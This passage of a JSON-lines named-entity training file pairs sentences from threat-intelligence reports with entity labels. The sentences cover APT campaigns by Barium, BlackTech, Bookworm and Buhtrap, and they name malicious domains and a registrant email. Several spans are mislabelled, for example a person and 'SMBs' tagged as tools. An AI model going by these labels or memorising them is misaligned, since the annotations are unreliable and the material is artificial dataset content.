that information to fashion phishing attacks intended to trick those employees into compromising their computers and networks .", "spans": {"ORGANIZATION: employees": [[129, 138], [272, 281]]}, "info": {"id": "dnrti_train_001709", "source": "dnrti_train"}} {"text": "We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post .", "spans": {"THREAT_ACTOR: Bahamut": [[73, 80]], "MALWARE: Devoted To Humanity": [[96, 115]]}, "info": {"id": "dnrti_train_001710", "source": "dnrti_train"}} {"text": "Although the Barium Defendants have relied on different and distinct infrastructures in an effort to evade detection , Barium used the same e-mail address ( hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers .", "spans": {"THREAT_ACTOR: Barium": [[259, 265]]}, "info": {"id": "dnrti_train_001711", "source": "dnrti_train"}} {"text": "The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update .", "spans": {"TOOL: ShadowPad": [[67, 76]], "THREAT_ACTOR: Barium": [[99, 105]], "ORGANIZATION: third-party software provider": [[140, 169]]}, "info": {"id": "dnrti_train_001712", "source": "dnrti_train"}} {"text": "To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background information from social media sites .", "spans": {"THREAT_ACTOR: Barium": [[73, 79]]}, "info": {"id": "dnrti_train_001713", "source": "dnrti_train"}} {"text": "Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within Human Resources or Business Development departments of the targeted organizations in order to compromise the computers of such 
individuals .", "spans": {"THREAT_ACTOR: Barium": [[52, 58]]}, "info": {"id": "dnrti_train_001714", "source": "dnrti_train"}} {"text": "The first method , described in Part D.1 , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques .", "spans": {"TOOL: Barlaiy": [[66, 73]], "TOOL: PlugXL": [[82, 88]]}, "info": {"id": "dnrti_train_001715", "source": "dnrti_train"}} {"text": "Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as if it were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim .", "spans": {"THREAT_ACTOR: Barium": [[79, 85]]}, "info": {"id": "dnrti_train_001716", "source": "dnrti_train"}} {"text": "Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above .", "spans": {"THREAT_ACTOR: Barium": [[0, 6]], "TOOL: Win32/Barlaiy": [[42, 55]], "TOOL: Win32/PlugX.L": [[86, 99]]}, "info": {"id": "dnrti_train_001717", "source": "dnrti_train"}} {"text": "Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information from a victim 's device .", "spans": {"TOOL: Win32/Barlaiy": [[5, 18]], "TOOL: Win32/PlugX.L": [[21, 34]], "THREAT_ACTOR: Barium": [[79, 85]]}, "info": {"id": "dnrti_train_001718", "source": "dnrti_train"}} {"text": "Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" .", "spans": {"THREAT_ACTOR: Barium": [[0, 6]], "TOOL: Win32/RibDoor.A!dha": [[90, 109]]}, "info": {"id": "dnrti_train_001719", "source": "dnrti_train"}} {"text": "While not detected at the 
time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": {"ORGANIZATION: Microsoft": [[33, 42]], "THREAT_ACTOR: Barium": [[94, 100]], "MALWARE: Win32/ShadowPad.A": [[139, 156]]}, "info": {"id": "dnrti_train_001720", "source": "dnrti_train"}} {"text": "MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) .", "spans": {"MALWARE: MXI Player": [[0, 10]]}, "info": {"id": "dnrti_train_001721", "source": "dnrti_train"}} {"text": "Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States .", "spans": {}, "info": {"id": "dnrti_train_001722", "source": "dnrti_train"}} {"text": "Barium has targeted Microsoft customers both in Virginia , the United States , and around the world .", "spans": {"THREAT_ACTOR: Barium": [[0, 6]], "ORGANIZATION: Microsoft customers": [[20, 39]]}, "info": {"id": "dnrti_train_001723", "source": "dnrti_train"}} {"text": "Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information from the victim 's network .", "spans": {}, "info": {"id": "dnrti_train_001724", "source": "dnrti_train"}} {"text": "According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella .", "spans": {"THREAT_ACTOR: Winnti Umbrella": [[169, 184]]}, "info": {"id": "dnrti_train_001725", "source": "dnrti_train"}} {"text": "Researchers from various 
security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti .", "spans": {"THREAT_ACTOR: LEAD": [[128, 132]], "THREAT_ACTOR: BARIUM": [[135, 141]], "THREAT_ACTOR: Wicked Panda": [[144, 156]], "THREAT_ACTOR: GREF": [[159, 163]], "THREAT_ACTOR: PassCV": [[166, 172]], "THREAT_ACTOR: Axiom": [[175, 180]], "THREAT_ACTOR: Winnti": [[187, 193]]}, "info": {"id": "dnrti_train_001726", "source": "dnrti_train"}} {"text": "It targets organizations in Japan , South Korea , and Taiwan , leveling its attacks on public sector agencies and telecommunications and other high-technology industries .", "spans": {"ORGANIZATION: public sector agencies": [[87, 109]]}, "info": {"id": "dnrti_train_001727", "source": "dnrti_train"}} {"text": "In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor .", "spans": {"TOOL: Elirks backdoor": [[124, 139]]}, "info": {"id": "dnrti_train_001728", "source": "dnrti_train"}} {"text": "Blackgear has been targeting various industries since its emergence a decade ago .", "spans": {}, "info": {"id": "dnrti_train_001729", "source": "dnrti_train"}} {"text": "Blackgear 's campaigns also use email as an entry point , which is why it's important to secure the email gateway .", "spans": {}, "info": {"id": "dnrti_train_001730", "source": "dnrti_train"}} {"text": "BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years .", "spans": {"ORGANIZATION: users": [[54, 59]]}, "info": {"id": "dnrti_train_001731", "source": "dnrti_train"}} {"text": "Our research indicates that it has started targeting Japanese users .", "spans": {"ORGANIZATION: Japanese users": [[53, 67]]}, "info": {"id": "dnrti_train_001732", "source": "dnrti_train"}} {"text": "The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors 
.", "spans": {"TOOL: binders": [[79, 86]], "TOOL: downloaders": [[89, 100]], "TOOL: backdoors": [[105, 114]]}, "info": {"id": "dnrti_train_001733", "source": "dnrti_train"}} {"text": "Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine .", "spans": {"TOOL: Binders": [[0, 7]]}, "info": {"id": "dnrti_train_001734", "source": "dnrti_train"}} {"text": "Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology .", "spans": {}, "info": {"id": "dnrti_train_001735", "source": "dnrti_train"}} {"text": "Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear .", "spans": {}, "info": {"id": "dnrti_train_001736", "source": "dnrti_train"}} {"text": "Active since 2012 , it has so far targeted Taiwanese government agencies and private organizations .", "spans": {"ORGANIZATION: government agencies": [[53, 72]]}, "info": {"id": "dnrti_train_001737", "source": "dnrti_train"}} {"text": "PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services .", "spans": {"TOOL: cloud storage services": [[117, 139]]}, "info": {"id": "dnrti_train_001738", "source": "dnrti_train"}} {"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": {"VULNERABILITY: Flash vulnerability": [[108, 127]], "VULNERABILITY: CVE-2015-5119": [[130, 143]]}, "info": {"id": "dnrti_train_001739", "source": "dnrti_train"}} {"text": "PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability in Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", 
"spans": {"VULNERABILITY: CVE-2017-7269": [[16, 29]]}, "info": {"id": "dnrti_train_001740", "source": "dnrti_train"}} {"text": "This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from .", "spans": {}, "info": {"id": "dnrti_train_001741", "source": "dnrti_train"}} {"text": "Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries .", "spans": {"ORGANIZATION: privatized agencies": [[27, 46]], "ORGANIZATION: government contractors": [[51, 73]]}, "info": {"id": "dnrti_train_001742", "source": "dnrti_train"}} {"text": "Shrouded Crossbow employs three BIFROST-derived backdoors : BIFROSE , KIVARS , and XBOW .", "spans": {"TOOL: BIFROST-derived backdoors": [[32, 57]], "TOOL: BIFROSE": [[60, 67]], "TOOL: KIVARS": [[70, 76]], "TOOL: XBOW": [[83, 87]]}, "info": {"id": "dnrti_train_001743", "source": "dnrti_train"}} {"text": "Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and are accompanied by decoy documents .", "spans": {"TOOL: RTLO technique": [[107, 121]], "MALWARE: decoy documents": [[145, 160]]}, "info": {"id": "dnrti_train_001744", "source": "dnrti_train"}} {"text": "XBOW 's capabilities are derived from BIFROSE and KIVARS ; Shrouded Crossbow gets its name from its unique mutex format .", "spans": {"TOOL: XBOW": [[0, 4]], "TOOL: BIFROSE": [[38, 45]], "TOOL: KIVARS": [[50, 56]]}, "info": {"id": "dnrti_train_001745", "source": "dnrti_train"}} {"text": "While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege .", "spans": {"TOOL: PLEAD": [[6, 11]], "TOOL: KIVARS": [[16, 22]]}, "info": 
{"id": "dnrti_train_001746", "source": "dnrti_train"}} {"text": "Recently , the JPCERT published a thorough analysis of the Plead backdoor , which , according to Trend Micro , is used by the cyberespionage group BlackTech .", "spans": {"ORGANIZATION: JPCERT": [[15, 21]], "TOOL: Plead backdoor": [[59, 73]], "ORGANIZATION: Trend Micro": [[97, 108]]}, "info": {"id": "dnrti_train_001747", "source": "dnrti_train"}} {"text": "Despite the fact that the Changing Information Technology Inc. certificate was revoked on July 4 , 2017 , the BlackTech group is still using it to sign their malicious tools .", "spans": {}, "info": {"id": "dnrti_train_001748", "source": "dnrti_train"}} {"text": "The BlackTech group is primarily focused on cyberespionage in Asia .", "spans": {}, "info": {"id": "dnrti_train_001749", "source": "dnrti_train"}} {"text": "The new activity described in this blogpost was detected by ESET in Taiwan , where the Plead malware has always been most actively deployed .", "spans": {"ORGANIZATION: ESET": [[60, 64]], "TOOL: Plead malware": [[87, 100]]}, "info": {"id": "dnrti_train_001750", "source": "dnrti_train"}} {"text": "Attackers are targeting the Windows platform and aiming at government institutions as well as big companies in Colombia .", "spans": {"ORGANIZATION: government institutions": [[59, 82]]}, "info": {"id": "dnrti_train_001751", "source": "dnrti_train"}} {"text": "Attackers like to use spear-phishing email with password protected RAR attachment to avoid being detected by the email gateway .", "spans": {"TOOL: RAR": [[67, 70]]}, "info": {"id": "dnrti_train_001752", "source": "dnrti_train"}} {"text": "The first sample was captured in April 2018 and since then we have observed a lot more related ones .", "spans": {}, "info": {"id": "dnrti_train_001753", "source": "dnrti_train"}} {"text": "After performing investigations on the classified victims , we find the attacker targets big companies and government agencies in Colombia .", "spans": {"ORGANIZATION: 
government agencies": [[107, 126]]}, "info": {"id": "dnrti_train_001754", "source": "dnrti_train"}} {"text": "After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[50, 80]], "ORGANIZATION: government agencies": [[136, 155]], "ORGANIZATION: financial institutions": [[158, 180]]}, "info": {"id": "dnrti_train_001755", "source": "dnrti_train"}} {"text": "The oldest sample we've seen up to now is from November 2013 .", "spans": {}, "info": {"id": "dnrti_train_001756", "source": "dnrti_train"}} {"text": "One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on .", "spans": {"ORGANIZATION: Pension Service": [[36, 51]]}, "info": {"id": "dnrti_train_001757", "source": "dnrti_train"}} {"text": "However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan .", "spans": {"TOOL: Blue Termite": [[90, 102]]}, "info": {"id": "dnrti_train_001758", "source": "dnrti_train"}} {"text": "Originally , the main infection vector of Blue Termite was spear-phishing emails .", "spans": {"TOOL: Blue Termite": [[42, 54]]}, "info": {"id": "dnrti_train_001759", "source": "dnrti_train"}} {"text": "Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "VULNERABILITY: flash exploit": [[96, 109]], "VULNERABILITY: CVE-2015-5119": [[112, 125]]}, "info": {"id": "dnrti_train_001760", "source": "dnrti_train"}} {"text": 
"Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]]}, "info": {"id": "dnrti_train_001761", "source": "dnrti_train"}} {"text": "In early July 2015 , however , Kaspersky Lab found a sample that creates a decryption key with Salt1 , Salt2 , and Salt3 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[31, 44]]}, "info": {"id": "dnrti_train_001762", "source": "dnrti_train"}} {"text": "From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures .", "spans": {"ORGANIZATION: Pension Service": [[53, 68]]}, "info": {"id": "dnrti_train_001763", "source": "dnrti_train"}} {"text": "It employs AES in addition to SID tricks , making it difficult to decrypt sensitive data .", "spans": {"TOOL: AES": [[11, 14]], "TOOL: SID": [[30, 33]]}, "info": {"id": "dnrti_train_001764", "source": "dnrti_train"}} {"text": "In order to fight back against this cyber-espionage , Kaspersky Lab will continue its research .", "spans": {"ORGANIZATION: Kaspersky Lab": [[54, 67]]}, "info": {"id": "dnrti_train_001765", "source": "dnrti_train"}} {"text": "Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 .", "spans": {"TOOL: Bookworm": [[0, 8]], "TOOL: PlugX": [[56, 61]], "ORGANIZATION: Unit 42": [[145, 152]]}, "info": {"id": "dnrti_train_001766", "source": "dnrti_train"}} {"text": "Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents .", "spans": {"TOOL: Bookworm": [[0, 8]]}, "info": {"id": "dnrti_train_001767", "source": "dnrti_train"}} {"text": "The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks .", 
"spans": {"TOOL: Plead malware": [[4, 17]], "TOOL: backdoor": [[23, 31]], "ORGANIZATION: Trend Micro": [[53, 64]]}, "info": {"id": "dnrti_train_001768", "source": "dnrti_train"}} {"text": "So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand .", "spans": {"TOOL: Bookworm Trojan": [[52, 67]]}, "info": {"id": "dnrti_train_001769", "source": "dnrti_train"}} {"text": "The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application .", "spans": {"TOOL: Smart Installer Maker": [[60, 81]], "TOOL: self-extracting RAR": [[111, 130]], "TOOL: decoy slideshow": [[159, 174]], "TOOL: Flash installation application": [[178, 208]]}, "info": {"id": "dnrti_train_001770", "source": "dnrti_train"}} {"text": "The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": {"TOOL: self-extracting RAR": [[4, 23]], "MALWARE: Loader.dll": [[85, 95]], "MALWARE: readme.txt": [[113, 123]]}, "info": {"id": "dnrti_train_001771", "source": "dnrti_train"}} {"text": "Using XREFs during static analysis is a common technique to quickly find where functions of interest are called .", "spans": {"TOOL: XREFs": [[6, 11]]}, "info": {"id": "dnrti_train_001773", "source": "dnrti_train"}} {"text": "The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server .", "spans": {"TOOL: Bookworm": [[24, 32], [120, 128]], "TOOL: modular Trojan": [[41, 55]]}, "info": {"id": "dnrti_train_001774", "source": "dnrti_train"}} {"text": "Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in 
Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server .", "spans": {"TOOL: Bookworm": [[27, 35], [83, 91]], "TOOL: Leader": [[246, 252]]}, "info": {"id": "dnrti_train_001775", "source": "dnrti_train"}} {"text": "While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand .", "spans": {"TOOL: Bookworm": [[55, 63], [117, 125]]}, "info": {"id": "dnrti_train_001776", "source": "dnrti_train"}} {"text": "Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server .", "spans": {"TOOL: Bookworm": [[7, 15]]}, "info": {"id": "dnrti_train_001777", "source": "dnrti_train"}} {"text": "The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server .", "spans": {"TOOL: Bookworm": [[18, 26]]}, "info": {"id": "dnrti_train_001778", "source": "dnrti_train"}} {"text": "Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm": [[70, 78]]}, "info": {"id": "dnrti_train_001779", "source": "dnrti_train"}} {"text": "Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": {"TOOL: Leader": [[0, 6]], "TOOL: Bookworm": [[10, 18]], "MALWARE: DLLs": [[114, 118]]}, "info": {"id": "dnrti_train_001780", "source": "dnrti_train"}} {"text": "The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for 
Leader to carry out its tasks .", "spans": {"TOOL: Bookworm": [[18, 26]], "TOOL: Leader": [[123, 129]]}, "info": {"id": "dnrti_train_001781", "source": "dnrti_train"}} {"text": "Unit 42 does not have detailed targeting information for all known Bookworm samples , but we are aware of attempted attacks on at least two branches of government in Thailand .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm samples": [[67, 83]]}, "info": {"id": "dnrti_train_001782", "source": "dnrti_train"}} {"text": "We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoy documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" .", "spans": {"TOOL: Bookworm": [[43, 51]], "MALWARE: decoy documents": [[138, 153]], "TOOL: dynamic DNS domain": [[182, 200]]}, "info": {"id": "dnrti_train_001783", "source": "dnrti_train"}} {"text": "We believe that it is likely threat actors will continue development of Bookworm , and will continue to use it for the foreseeable future .", "spans": {"TOOL: Bookworm": [[72, 80]]}, "info": {"id": "dnrti_train_001784", "source": "dnrti_train"}} {"text": "Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand .", "spans": {"TOOL: Bookworm": [[29, 37]]}, "info": {"id": "dnrti_train_001785", "source": "dnrti_train"}} {"text": "Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting with a majority of systems existing within Thailand .", "spans": {"TOOL: Bookworm C2 servers": [[56, 75]]}, "info": {"id": "dnrti_train_001786", "source": "dnrti_train"}} {"text": "As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code .", "spans": {"TOOL: Bookworm": [[37, 45]], "TOOL: Trojan": [[52, 58]]}, "info": {"id": 
"dnrti_train_001787", "source": "dnrti_train"}} {"text": "We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan .", "spans": {"TOOL: date code": [[43, 52]]}, "info": {"id": "dnrti_train_001788", "source": "dnrti_train"}} {"text": "Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier .", "spans": {"MALWARE: date string hardcoded": [[26, 47]], "TOOL: Bookworm sample": [[58, 73]]}, "info": {"id": "dnrti_train_001789", "source": "dnrti_train"}} {"text": "A Trojan sending a build identifier to its C2 server is quite common , as it notifies the threat actors of the specific version of the Trojan with which they are interacting .", "spans": {}, "info": {"id": "dnrti_train_001790", "source": "dnrti_train"}} {"text": "We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack for which we did not have detailed targeting information .", "spans": {"TOOL: Bookworm samples": [[16, 32]]}, "info": {"id": "dnrti_train_001792", "source": "dnrti_train"}} {"text": "Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": {"MALWARE: decoy slideshow": [[8, 23]]}, "info": {"id": "dnrti_train_001793", "source": "dnrti_train"}} {"text": "The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Prince of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event .", "spans": {}, "info": {"id": "dnrti_train_001794", "source": "dnrti_train"}} {"text": "Chitpas is heavily involved with Thai politics and was a core leader of the People's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 
2014 .", "spans": {}, "info": {"id": "dnrti_train_001795", "source": "dnrti_train"}} {"text": "The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand .", "spans": {"TOOL: decoy": [[26, 31]], "TOOL: Chitpas Tant Kridakon": [[51, 72]]}, "info": {"id": "dnrti_train_001796", "source": "dnrti_train"}} {"text": "These images were associated with the Bookworm campaign code \" 20150905 \" .", "spans": {}, "info": {"id": "dnrti_train_001797", "source": "dnrti_train"}} {"text": "Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems ( ASN ) located in Thailand .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: Bookworm": [[52, 60]]}, "info": {"id": "dnrti_train_001798", "source": "dnrti_train"}} {"text": "The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group .", "spans": {}, "info": {"id": "dnrti_train_001799", "source": "dnrti_train"}} {"text": "We believe that the IP addresses from Canada , Russia and Norway are analysis systems of antivirus companies or security researchers .", "spans": {"ORGANIZATION: antivirus companies": [[89, 108]]}, "info": {"id": "dnrti_train_001800", "source": "dnrti_train"}} {"text": "Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others .", "spans": {"TOOL: Bookworm": [[14, 22]], "TOOL: FFRAT": [[131, 136]], "TOOL: Poison Ivy": [[139, 149]], "TOOL: PlugX": [[152, 157]]}, "info": {"id": "dnrti_train_001801", "source": "dnrti_train"}} {"text": "Unit 42 enumerated the threat infrastructure related to Bookworm and created a chart to visualize connected entities to its current attack campaign .", "spans": {"ORGANIZATION: Unit 42": 
[[0, 7]], "TOOL: Bookworm": [[56, 64]]}, "info": {"id": "dnrti_train_001803", "source": "dnrti_train"}} {"text": "Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 .", "spans": {"TOOL: Bookworm Trojan": [[90, 105]]}, "info": {"id": "dnrti_train_001804", "source": "dnrti_train"}} {"text": "The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign .", "spans": {}, "info": {"id": "dnrti_train_001805", "source": "dnrti_train"}} {"text": "So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks .", "spans": {"ORGANIZATION: Unit 42": [[9, 16]], "TOOL: FFRAT": [[101, 106]], "TOOL: PlugX": [[109, 114]], "TOOL: Poison Ivy": [[117, 127]], "TOOL: Scieron Trojans": [[132, 147]]}, "info": {"id": "dnrti_train_001806", "source": "dnrti_train"}} {"text": "The threat actors have continually used Flash Player installers and Flash slideshows for decoys .", "spans": {"TOOL: Flash Player installers": [[40, 63]], "TOOL: Flash slideshows": [[68, 84]]}, "info": {"id": "dnrti_train_001807", "source": "dnrti_train"}} {"text": "The vast majority of systems communicating with Bookworm C2 servers are within the Bangkok metropolitan area where a majority of the government of Thailand exists .", "spans": {"TOOL: Bookworm": [[48, 56]]}, "info": {"id": "dnrti_train_001808", "source": "dnrti_train"}} {"text": "Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]], "ORGANIZATION: financial institutions": [[73, 95]]}, "info": {"id": "dnrti_train_001809", "source": "dnrti_train"}} {"text": "At the moment , the group is known to target Russian and Ukrainian banks .", "spans": 
{}, "info": {"id": "dnrti_train_001810", "source": "dnrti_train"}} {"text": "Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]]}, "info": {"id": "dnrti_train_001811", "source": "dnrti_train"}} {"text": "Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) .", "spans": {}, "info": {"id": "dnrti_train_001812", "source": "dnrti_train"}} {"text": "We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 .", "spans": {"THREAT_ACTOR: Buhtrap": [[41, 48]]}, "info": {"id": "dnrti_train_001814", "source": "dnrti_train"}} {"text": "It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan .", "spans": {"TOOL: compromised websites": [[48, 68]], "TOOL: Buhtrap": [[79, 86]], "TOOL: Corkow Trojan": [[123, 136]]}, "info": {"id": "dnrti_train_001815", "source": "dnrti_train"}} {"text": "Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": {"VULNERABILITY: kit Niteris": [[38, 49]], "TOOL: Corkow": [[65, 71]]}, "info": {"id": "dnrti_train_001816", "source": "dnrti_train"}} {"text": "Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members .", "spans": {}, "info": {"id": "dnrti_train_001817", "source": "dnrti_train"}} {"text": "However , it is still widely used , notably in Russia .", "spans": {}, "info": {"id": "dnrti_train_001818", "source": "dnrti_train"}} {"text": "As noted in our previous blog on Buhtrap , this gang has been actively targeting Russian businesses , mostly through spear-phishing .", "spans": {}, "info": {"id": 
"dnrti_train_001819", "source": "dnrti_train"}} {"text": "It is thus interesting to see Buhtrap add strategic web compromises to their arsenal .", "spans": {}, "info": {"id": "dnrti_train_001820", "source": "dnrti_train"}} {"text": "The first malware we saw was the lurk downloader , which was distributed on October 26th .", "spans": {"TOOL: lurk downloader": [[33, 48]]}, "info": {"id": "dnrti_train_001821", "source": "dnrti_train"}} {"text": "The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload .", "spans": {"MALWARE: AmmyyService.exe": [[97, 113]], "MALWARE: AmmyySvc.exe": [[117, 129]]}, "info": {"id": "dnrti_train_001822", "source": "dnrti_train"}} {"text": "Buhtrap is getting better at disguising the code they inject into compromised websites .", "spans": {"THREAT_ACTOR: Buhtrap": [[0, 7]], "TOOL: compromised websites": [[66, 86]]}, "info": {"id": "dnrti_train_001823", "source": "dnrti_train"}} {"text": "With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software .", "spans": {"TOOL: Lurk banking trojan": [[44, 63]]}, "info": {"id": "dnrti_train_001824", "source": "dnrti_train"}} {"text": "They have different functions and ways of spreading , but the same purpose — to steal money from the accounts of businesses .", "spans": {}, "info": {"id": "dnrti_train_001825", "source": "dnrti_train"}} {"text": "Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": {"TOOL: SMBs": [[68, 72]], "ORGANIZATION: accountants": [[110, 121]]}, "info": {"id": "dnrti_train_001826", "source": "dnrti_train"}} {"text": "The first encounter with Buhtrap was registered back in 2014 .", "spans": {}, "info": {"id": "dnrti_train_001827", "source": "dnrti_train"}} {"text": "For now , we can call RTM 
